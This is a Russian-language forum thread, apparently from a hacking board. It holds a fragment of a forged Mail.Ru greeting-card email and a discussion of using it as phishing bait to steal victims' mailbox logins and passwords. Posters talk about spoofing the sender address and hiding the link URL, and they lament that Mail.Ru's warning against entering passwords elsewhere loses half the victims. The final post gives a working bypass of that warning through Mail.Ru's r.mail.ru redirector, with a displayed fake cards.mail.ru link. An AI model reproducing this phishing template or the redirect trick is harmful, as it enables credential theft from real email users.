<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82064&amp;S=&amp;tid=7388" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/ccd109545010520c6e8f0065ddc85820.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82064" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> &nbsp;
Пожелания</a></font></td>

<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"></td>
</tr>

</tbody></table>










<font color="#666666" face="Arial" size="1">Чтобы своевременно узнавать о праздниках, именинах и конкурсах, <a href="http://content.mail.ru/cgi-bin/subscribe.cgi?list_id=782&amp;list_id=26785" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">подпишитесь на рассылку</a>.</font>

</td></tr>
</tbody></table>

<hr bgcolor="#D9D9D9" noshade="noshade">

<font color="#666666" face="Arial" size="2"><b><img src="http://*****.ru/img5.gif" alt="" valign="absmiddle" border="0" height="17" width="17"> <a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">Открытки@Mail.Ru</a>&nbsp;– открытки на все случаи жизни!</b></font><br><br><br>

раньше всегда пользовался этим фековым письмом, но теперь почемуто когда отправляю его, то оно не доходит. почему?

а ты его случайно не от лица администрации отправляешь (какой ящик вписываешь в поле "от кого")? Если что то типа "Администрация Mail.Ru" бла бла бла, то поменяй на другое, а то письма отправленные от "админов" блочаться.

раньше (до вчерашнего) дня отсылал от Открытки@Mail.ru все ок приходило. сегодня обнаружил что письма не доходят. стал от обычных отправлять, но и они не доходят! в чем же проблема?

раньше (до вчерашнего) дня отсылал от Открытки@Mail.ru все ок приходило. сегодня обнаружил что письма не доходят. стал от обычных отправлять, но и они не доходят! в чем же проблема?


приходит вот так
Открытки Mail.Ru <саrds@cards.mail.ru>

stalles


покажи свой пример письма

прочел всю тему но не понел...
подкиньте плз нормальный прмер как скрыть урл...

и ешё , как жертве отправить точно такое же письмо?

http://keep4u.ru/imgs/s/080405/f4/f411919ca8c28edb6a.jpg (http://keep4u.ru/full/080405/f411919ca8c28edb6a/jpg)

2КИНГ

у меня доходила эта хтмл, только почему то теперь когда открываю письмо для просмотра то у меня выдает код хтмл вместо визуального отображения =(

т.е.
<table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td id="aj_body"> и тд

З.Ы. не могу понять почему не отображает =(

народ а вот вы посылаете эти фейк открытки с ссылкой на фейк страницу , по которой должна пройти жертва и ввести свой логин пас , но как только жертва жмет на вашу ссылку , вылазиет сообшение : Вы собираетесь пеерйти на сайт www.blabla.ru Никогда не вводите пароль от своего вочтового ящика на посторонних ресурсах.

Эта надпись срезает процентов пятьдесят жерт которые уже не поведуца на развод...
нада как то бороца с этой фишкой от мейла

кому интересно решил проблему с выеб**м mail.ru теперь не пишет типа Вы собираетесь пеерйти на сайт www.blabla.ru Никогда не вводите пароль от своего вочтового ящика на посторонних ресурсах.

для этого используем:

<a href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/ВАШ САЙТ" target="_blank">http://cards.mail.ru/card.html?cd=30dc79c7f966e8032cbd8c2ada48e6ad</a></font><br